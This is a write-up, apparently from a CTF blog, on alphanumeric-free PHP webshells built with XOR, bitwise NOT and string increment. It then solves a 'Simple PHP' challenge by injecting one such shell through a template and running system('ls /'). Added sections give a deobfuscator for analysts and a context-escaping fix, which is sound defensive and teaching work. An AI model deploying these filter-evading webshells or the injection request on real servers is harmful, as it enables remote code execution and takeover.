Method 1: XOR
```php
<?php
// The "%XX" sequences are URL-encoded bytes: this form is meant to travel as a
// request parameter, so the server decodes them before PHP evaluates the string.
$_ = ('%01' ^ '`') . ('%13' ^ '`') . ('%13' ^ '`') . ('%05' ^ '`') . ('%12' ^ '`') . ('%14' ^ '`'); // "assert"
$__ = '_' . ('%0D' ^ ']') . ('%2F' ^ '`') . ('%0E' ^ ']') . ('%09' ^ ']');                       // "_POST"
$___ = $$__;   // variable variable: the $_POST array
$_($___[_]);   // bare _ is an undefined constant: the string "_" on PHP 7 (with a warning), an Error on PHP 8
```
```php
<?php
// Character-by-character XOR of two printable strings; no URL decoding needed.
$_ = "!((%)(" ^ "@[[@[\\";   // "assert"
$__ = "!+/((" ^ "~{`{|";     // "_POST"
$___ = $$__;
$_($___[_]);
```
Method 2: bitwise NOT
```php
<?php
// ~ on a string inverts every byte. Byte 1 of each UTF-8 character below is chosen
// so that its inverse is the ASCII letter wanted, so the file contains no letters.
// The original wrote the offsets as $__{$_}; curly-brace string offsets were removed
// in PHP 8.0, so they are written as $__[$_] here.
$_++;                                 // null++ is 1: the index of the second byte
$__ = "极"; $___  = ~($__[$_]);
$__ = "区"; $___ .= ~($__[$_]);
            $___ .= ~($__[$_]);
$__ = "皮"; $___ .= ~($__[$_]);
$__ = "十"; $___ .= ~($__[$_]);
$__ = "勺"; $___ .= ~($__[$_]);       // $___ is now "assert"
$____ = '_';
$__ = "寸"; $____ .= ~($__[$_]);
$__ = "小"; $____ .= ~($__[$_]);
$__ = "欠"; $____ .= ~($__[$_]);
$__ = "立"; $____ .= ~($__[$_]);      // $____ is now "_POST"
$_ = $$____;
$___($_[_]);
```
```php
<?php
// Same idea, but the offsets 1 and 2 are derived from comparisons instead of ++,
// and the second or third byte of each character is used as needed.
// Curly-brace offsets from the original ($___{$_}) are written as $___[$_] (PHP 8 compatible).
$__ = ('>' > '<') + ('>' > '<');   // true + true = 2
$_ = $__ / $__;                    // 1
$____ = '';
$___ = "瞰"; $____ .= ~($___[$_]);
$___ = "和"; $____ .= ~($___[$__]);
$___ = "和"; $____ .= ~($___[$__]);
$___ = "的"; $____ .= ~($___[$_]);
$___ = "半"; $____ .= ~($___[$_]);
$___ = "始"; $____ .= ~($___[$__]);   // "assert"
$_____ = '_';
$___ = "俯"; $_____ .= ~($___[$__]);
$___ = "瞰"; $_____ .= ~($___[$__]);
$___ = "次"; $_____ .= ~($___[$_]);
$___ = "站"; $_____ .= ~($___[$_]);   // "_POST"
$_ = $$_____;
$____($_[$__]);
```
```python
def get(shell):
    # 8-bit bitwise NOT of each character (255 - ord), written as %XX so the
    # server's URL decoding turns it back into the raw high byte
    hexbit = ''.join(map(lambda x: hex(~(-(256 - ord(x)))), shell))
    hexbit = hexbit.replace('0x', '%')
    print(hexbit)

get('assert')   # %9e%8c%8c%9a%8d%8b
get('_POST')    # %a0%af%b0%ac%ab
```

```php
<?php
$_ = ~"%9e%8c%8c%9a%8d%8b";   // after URL decoding and inversion: "assert"
$__ = ~"%a0%af%b0%ac%ab";     // "_POST"
$___ = $$__;
$_($___[_]);
```
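For an analyst who finds one of these strings in a dropped file or a request log, the useful direction is the reverse one: recover what the obfuscated literals evaluate to without executing anything. The following Python script is an added example and is not part of the original post. It statically evaluates the two literal forms shown above in Method 1 and Method 2 (`'a'^'b'` pairs joined by `.`, and `~"..."`), URL-decoding `%XX` first because that is what the server does to a request parameter. The sample inputs are the three snippets from the page; the per-character UTF-8 form with `~($__[$_])` is not handled here, since it depends on variable state.

```python
import re
from urllib.parse import unquote_to_bytes

# A single- or double-quoted PHP literal. Escapes are not parsed except "\\"
# in double quotes, which is the only one these payloads use.
LITERAL = r"'[^']*'|\"[^\"]*\""
# One operand of a concatenation chain: optional ~, a literal, optional ^ literal.
TOKEN = re.compile(rf"(~)?\s*({LITERAL})(?:\s*\^\s*({LITERAL}))?")
ASSIGN = re.compile(r"(\$\w+)\s*=\s*(.+)", re.S)


def literal_bytes(lit: str) -> bytes:
    """Bytes PHP sees for a quoted literal after the web server has URL-decoded
    the request (%XX -> raw byte), which is how the %01-style payloads arrive."""
    body = lit[1:-1]
    if lit[0] == '"':
        body = body.replace("\\\\", "\\")
    return unquote_to_bytes(body)


def decode_expression(rhs: str):
    """Statically evaluate a chain of literals joined by '.', applying ^ and ~.
    Returns None when the expression uses neither operator."""
    out = bytearray()
    obfuscated = False
    for m in TOKEN.finditer(rhs):
        val = literal_bytes(m.group(2))
        if m.group(3):
            other = literal_bytes(m.group(3))
            # PHP's string ^ truncates to the shorter operand; zip does the same.
            val = bytes(a ^ b for a, b in zip(val, other))
            obfuscated = True
        if m.group(1):
            val = bytes((~b) & 0xFF for b in val)  # 8-bit NOT, as PHP's ~ on strings
            obfuscated = True
        out += val
    return out.decode("latin-1") if obfuscated else None


def decode_obfuscated_strings(php_src: str) -> dict:
    """Map each variable assigned from an XOR/NOT expression to its plaintext."""
    found = {}
    for stmt in php_src.split(";"):
        m = ASSIGN.search(stmt)
        if m:
            decoded = decode_expression(m.group(2))
            if decoded is not None:
                found[m.group(1)] = decoded
    return found


# Sample inputs: the three snippets from the page above, as they would sit in a file or log.
XOR_URLENCODED = "<?php $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); $__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); $___=$$__; $_($___[_]);"
XOR_PLAIN = r'<?php $_ = "!((%)("^"@[[@[\\"; $__ = "!+/(("^"~{`{|"; $___ = $$__; $_($___[_]);'
NOT_URLENCODED = '<?php $_ = ~"%9e%8c%8c%9a%8d%8b"; $__ = ~"%a0%af%b0%ac%ab"; $___ = $$__; $_($___[_]);'

if __name__ == "__main__":
    for name, src in [("xor-urlencoded", XOR_URLENCODED), ("xor", XOR_PLAIN), ("not", NOT_URLENCODED)]:
        print(name, decode_obfuscated_strings(src))
```

Once the decoder reports `$_` as `assert` and `$__` as `_POST`, the final statement `$_($___[_])` reads as `assert($_POST['_'])`, which is the signature to alert on regardless of how the two strings were encoded.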
Method 3: increment
```php
<?php
// [] . '' is "Array" (array-to-string conversion), whose first character "A" is
// then incremented repeatedly: PHP's ++ on a string steps through the alphabet.
$_ = [] . '';
$___ = $_[$__];    // $__ is undefined, so this reads offset 0: "A"
$__ = $___;
$_ = $___;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   // "S"
$___ .= $__; $___ .= $__;                                                                                   // "ASS"
$__ = $_;
$__++;$__++;$__++;$__++;                                                                                    // "E"
$___ .= $__;                                                                                                // "ASSE"
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__;$__++;                          // "R" (the bare $__; is a no-op)
$___ .= $__;                                                                                                // "ASSER"
$__++;$__++;                                                                                                // "T"
$___ .= $__;                                                                                                // "ASSERT" (function names are case-insensitive)
$__ = $_;
$____ = "_";
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;                  // "P"
$____ .= $__;
$__ = $_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;                        // "O"
$____ .= $__;
$__++;$__++;$__++;$__++;                                                                                    // "S"
$____ .= $__;
$__++;                                                                                                      // "T"
$____ .= $__;                                                                                               // "_POST"
$_ = $$____;
$___($_[_]);
```
```php
<?php
// Same construction; "$_" interpolates the empty array as "Array" (the @ hides the
// conversion warning) and '!'=='@' is false, i.e. offset 0, so no undefined variable is needed.
$_ = [];
$_ = @"$_";
$_ = $_['!' == '@'];   // "A"
$___ = $_;
$__ = $_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;         // "S"
$___ .= $__; $___ .= $__;                                                                                         // "ASS"
$__ = $_;
$__++;$__++;$__++;$__++;                                                                                          // "E"
$___ .= $__;
$__ = $_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;               // "R"
$___ .= $__;
$__ = $_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   // "T"
$___ .= $__;                                                                                                      // "ASSERT"
$____ = '_';
$__ = $_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;                        // "P"
$____ .= $__;
$__ = $_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;                              // "O"
$____ .= $__;
$__ = $_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;         // "S"
$____ .= $__;
$__ = $_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;   // "T"
$____ .= $__;                                                                                                     // "_POST"
$_ = $$____;
$___($_[_]);
```
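The increment form cannot be read off with a simple regex, because every character is produced by repeated `++` on a copy of the `A` taken from the string `Array`. The script below is an added example, not the post's own code: it implements PHP's string increment (the alphanumeric carry, `Z` to `AA`, `Az` to `Ba`) and a small evaluator for the handful of statement shapes these payloads use (`$x=[]`, `$x=@"$x"`, `$x=$y[...]`, `$x=$y`, `$x.=$y`, `$x++`, `$x=$$y`, and the final call), so an analyst can recover the function name and the superglobal being read without running the file. String offsets are evaluated as 0, which is what the index expressions in these payloads (`$__` undefined, `'!'=='@'`) amount to; both snippets above fit this subset. The sample payload is constructed here in the same dialect, with the increment runs generated so their counts are explicit.

```python
import re


def php_increment(s: str) -> str:
    """Emulate PHP's ++ on a non-numeric string: walk from the end, carrying
    through a-z, A-Z and 0-9 ('Z' -> 'AA', 'Az' -> 'Ba'); stop at any other char."""
    if s == "":
        return "1"  # PHP: ""++ gives "1"
    chars = list(s)
    for i in range(len(chars) - 1, -1, -1):
        c = chars[i]
        if c in "zZ9":
            chars[i] = {"z": "a", "Z": "A", "9": "0"}[c]  # wrap and carry left
            continue
        if c.isascii() and c.isalnum():
            chars[i] = chr(ord(c) + 1)
            return "".join(chars)
        return "".join(chars)  # non-alphanumeric character: no carry past it
    first = s[0]  # carried off the front: prepend according to the first char's class
    return ("1" if first.isdigit() else "a" if first.islower() else "A") + "".join(chars)


def evaluate(php_src: str) -> dict:
    """Run the statement shapes used by increment-style shells and report the
    call they build as {"function", "source", "key"}."""
    env = {}

    def text(v):
        return "Array" if isinstance(v, list) else v  # PHP array-to-string conversion

    def rhs_value(expr):
        expr = expr.strip()
        if expr == "[]":
            return []
        if expr.startswith("[]"):                      # [].'' -> "Array"
            return "Array"
        if re.fullmatch(r'@?"(\$_+)"', expr):          # "$_" interpolation
            return text(env.get(expr.strip('@"'), ""))
        if re.fullmatch(r"""["']_["']""", expr):
            return "_"
        m = re.fullmatch(r"(\$_+)\[.*\]", expr)
        if m:                                           # string offset, evaluated as 0
            return text(env.get(m.group(1), ""))[:1]
        m = re.fullmatch(r"\$(\$_+)", expr)
        if m:                                           # variable variable: name the target
            return "$" + text(env.get(m.group(1), ""))
        if re.fullmatch(r"\$_+", expr):
            return env.get(expr, "")
        raise ValueError("unsupported expression: " + expr)

    result = None
    for stmt in php_src.replace("<?php", "").split(";"):
        stmt = stmt.strip()
        if not stmt:
            continue
        if m := re.fullmatch(r"(\$_+)\+\+", stmt):
            env[m.group(1)] = php_increment(text(env.get(m.group(1), "")))
        elif m := re.fullmatch(r"(\$_+)\s*\.=\s*(.+)", stmt):
            env[m.group(1)] = text(env.get(m.group(1), "")) + text(rhs_value(m.group(2)))
        elif m := re.fullmatch(r"(\$_+)\s*=\s*(.+)", stmt):
            env[m.group(1)] = rhs_value(m.group(2))
        elif m := re.fullmatch(r"(\$_+)\((\$_+)\[(.*)\]\)", stmt):
            result = {"function": text(env[m.group(1)]),
                      "source": text(env[m.group(2)]), "key": m.group(3)}
        elif re.fullmatch(r"\$_+", stmt):
            pass  # a bare "$__;" is a no-op
        else:
            raise ValueError("unsupported statement: " + stmt)
    return result


def _run(n):
    return "$__++;" * n


# Constructed sample in the dialect of the snippets above; counts are explicit.
SAMPLE = (
    "<?php $_=[]; $_=@\"$_\"; $_=$_['!'=='@']; $___=$_; $__=$_;"
    + _run(18) + "$___.=$__; $___.=$__; $__=$_;"
    + _run(4) + "$___.=$__; $__=$_;"
    + _run(17) + "$___.=$__; $__=$_;"
    + _run(19) + "$___.=$__;"
    + "$____='_'; $__=$_;" + _run(15) + "$____.=$__; $__=$_;"
    + _run(14) + "$____.=$__; $__=$_;"
    + _run(18) + "$____.=$__; $__=$_;"
    + _run(19) + "$____.=$__;"
    + "$_=$$____; $___($_[_]);"
)

if __name__ == "__main__":
    print(evaluate(SAMPLE))
```

The evaluator deliberately refuses anything outside this subset rather than guessing, so on a real sample an "unsupported statement" error tells the analyst exactly which construct needs a closer look.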
Simple PHP
The challenge's front page is a registration and login form. Register an arbitrary account, log in, and try the features.
There is a function for opening an image; capture the request and look at its parameters.
The image parameter gives arbitrary file read, so read the source of index.
index.php:

```php
<?php
error_reporting(0);
if (isset($_POST['user']) && isset($_POST['pass'])) {
    $hash_user = md5($_POST['user']);
    $hash_pass = 'zsf' . md5($_POST['pass']);
    if (isset($_POST['punctuation'])) {
        if (strlen($_POST['user']) > 6) {
            echo("<script>alert('Username is too long!');</script>");
        } elseif (strlen($_POST['website']) > 25) {
            echo("<script>alert('Website is too long!');</script>");
        } elseif (strlen($_POST['punctuation']) > 1000) {
            echo("<script>alert('Punctuation is too long!');</script>");
        } else {
            if (preg_match('/[^\w\/\(\)\*<>]/', $_POST['user']) === 0) {
                if (preg_match('/[^\w\/\*:\.\;\(\)\n<>]/', $_POST['website']) === 0) {
                    // Strips letters, digits, '>' and '?' (the commas are literal members of the class).
                    $_POST['punctuation'] = preg_replace("/[a-z,A-Z,0-9>\?]/", "", $_POST['punctuation']);
                    $template = file_get_contents('./template.html');
                    // Raw user input is spliced into PHP source text.
                    $content = str_replace("__USER__", $_POST['user'], $template);
                    $content = str_replace("__PASS__", $hash_pass, $content);
                    $content = str_replace("__WEBSITE__", $_POST['website'], $content);
                    $content = str_replace("__PUNC__", $_POST['punctuation'], $content);
                    // The sink: the filled template is written out as an executable .php file.
                    file_put_contents('sandbox/' . $hash_user . '.php', $content);
                    echo("<script>alert('Successed!');</script>");
                } else {
                    echo("<script>alert('Invalid chars in website!');</script>");
                }
            } else {
                echo("<script>alert('Invalid chars in username!');</script>");
            }
        }
    } else {
        // Login path: no punctuation field means set cookies and redirect to the generated page.
        setcookie("user", $_POST['user'], time() + 3600);
        setcookie("pass", $hash_pass, time() + 3600);
        Header("Location:sandbox/$hash_user.php");
    }
}
?>
```
Note the dangerous function file_put_contents in index.php. If we can get malicious PHP code into $content, it is written to a .php file, and $content is produced by substituting values we supply into template.html. So read the template file as well.
template.html:

```php
<?php
error_reporting(0);
$user = ((string)__USER__);   // __USER__ is substituted as a bare expression, not a quoted string
$pass = ((string)__PASS__);
if (isset($_COOKIE['user']) && isset($_COOKIE['pass'])
    && $_COOKIE['user'] === $user && $_COOKIE['pass'] === $pass) {
    echo($_COOKIE['user']);
} else {
    die("<script>alert('Permission denied!');</script>");
}
?>
......
<a href="#" class="powered_by">__PUNC__</a>
......
<li class="desktop_icon" id="win16" path="__WEBSITE__">
......
```
We can see where the four parameters land: starting with user, the substitution is already inside PHP code, so a one-line webshell could be written there. However, index.php filters the registration data. The parameters we control are user, pass, website and punctuation; pass goes through md5 and string concatenation, so it cannot be used.
user is limited to a length of at most 6, too short for a one-line webshell. punctuation allows up to 1000 characters but may not contain upper- or lowercase letters, digits or >. The approach is to close the expression in user and open a comment there, so that the later parameter __PUNC__ also lands inside PHP code, and then use a comment to deal with the code that follows.
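The root cause is that index.php builds PHP source by pasting raw user input into a template and then tries to make that safe with a character denylist, which the rest of this write-up shows is not enough. What follows is an added example of the fix a developer would apply; it is not the challenge's code or any project's code. Each placeholder is substituted according to the context it lands in (a PHP string literal inside code, an HTML-escaped string inside markup) in a single pass. The template below is a constructed stand-in for template.html, trimmed to the relevant lines, `html.escape` is Python's standard-library counterpart of htmlspecialchars, and the placeholder hash is made up. The round-trip check shows that the user value from this write-up, `1)/*`, survives only as data.

```python
import html
import re

# Constructed stand-in for the challenge's template.html, trimmed to the lines that
# matter: __USER__/__PASS__ sit inside PHP code, __PUNC__/__WEBSITE__ inside HTML.
TEMPLATE = (
    "<?php\n"
    "$user = ((string)__USER__);\n"
    "$pass = ((string)__PASS__);\n"
    "if (isset($_COOKIE['user']) && $_COOKIE['user'] === $user) { echo($_COOKIE['user']); }\n"
    "?>\n"
    '<a href="#" class="powered_by">__PUNC__</a>\n'
    '<li class="desktop_icon" path="__WEBSITE__">\n'
)


def php_string_literal(value: str) -> str:
    """Encode value as a PHP single-quoted literal. Only backslash and the quote
    are special there, so no input can end the string, open a comment or leave
    PHP mode; length and character checks become defence in depth, not the fence."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def php_unquote(lit: str) -> str:
    """Inverse of php_string_literal, used to check what PHP will actually see."""
    return re.sub(r"\\([\\'])", r"\1", lit[1:-1])


def render(user: str, pass_hash: str, website: str, punctuation: str) -> str:
    """Fill the template in one pass, escaping each value for the context it
    lands in. A single re.sub also means a value containing "__PASS__" is never
    expanded by a later replacement, unlike chained str_replace calls."""
    values = {
        "USER": php_string_literal(user),
        "PASS": php_string_literal(pass_hash),
        "WEBSITE": html.escape(website, quote=True),
        "PUNC": html.escape(punctuation, quote=True),
    }
    return re.sub(r"__(USER|PASS|WEBSITE|PUNC)__", lambda m: values[m.group(1)], TEMPLATE)


def rendered_user_value(rendered: str):
    """Read the $user literal back out of a rendered file and decode it."""
    m = re.search(r"\$user = \(\(string\)('(?:[^'\\]|\\.)*')\);", rendered)
    return php_unquote(m.group(1)) if m else None


if __name__ == "__main__":
    # The write-up's inputs: user closes the expression, punctuation carries the shell.
    # "zsf" + 32 zeros stands in for the md5-derived hash (constructed placeholder).
    page = render("1)/*", "zsf" + "0" * 32, "",
                  "*/;@$_++;$__='#./|{'^'|~`//';${$__}[!$_](${$__}[$_]);/*")
    print(page)
    print("PHP sees $user as:", repr(rendered_user_value(page)))
```

With this rendering, `$user` becomes the literal `'1)/*'`, the comment opener never reaches the lexer as syntax, and the punctuation text ends up entity-escaped inside the anchor, outside PHP mode. The denylist on punctuation, the reason the alphanumeric-free shells above exist at all, is no longer what the file's integrity depends on.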
__PUNC__ therefore needs a webshell without digits or letters; see the following references:
Summary of alphanumeric-free webshells, zkzq's blog (CSDN)
Some webshells that contain no digits or letters | 离别歌 (leavesongs.com)
There is also another webshell without digits or letters circulating online, recorded here:
```text
user=1)/*&pass=rr&website=&punctuation=*/;@$_%2b%2b;$__='#./|{'^'|~`//';${$__}[!$_](${$__}[$_]);/*
```
List the root directory:
```text
0=assert&1=system("ls /");
```
Then drop a shell and read the flag directly.